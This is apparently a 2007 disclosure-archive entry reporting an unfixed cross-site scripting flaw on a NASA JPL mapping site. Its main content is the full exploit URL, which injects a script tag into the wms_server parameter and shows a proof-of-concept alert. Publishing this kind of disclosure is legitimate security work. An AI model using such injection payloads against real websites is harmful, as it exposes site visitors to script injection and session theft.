Security researcher Bl4cKM4g1c, has submitted on 02/09/2007 a cross-site-scripting (XSS) vulnerability affecting onearth.jpl.nasa.gov, which at the time of submission ranked 795 on the web according to Alexa. 
We manually validated and published a mirror of this vulnerability on 07/09/2007. It is currently unfixed. 
If you believe that this security issue has been corrected, please send us an e-mail. | 
 
              | Date submitted: 02/09/2007 | 
Date published: 07/09/2007 | 
Fixed? Mail us! | Status:   UNFIXED |  
 
| Author: Bl4cKM4g1c | 
Domain: onearth.jpl.nasa.gov | 
Category: XSS | 
Pagerank: 795 | 
 
 
 
URL: http://onearth.jpl.nasa.gov/browse.cgi?wms_server="><script>alert("XSS By Bl4cK M4g1c")</script>&layers=modis,global_mosaic&srs=EPSG:4326&width=1000&height=500&bbox=-180,-90,180,90 &format=image/jpeg&styles=&zoom= | 
 
| 
Click here to view the mirror
 | 
 
| 
 | 
 
 
         
 |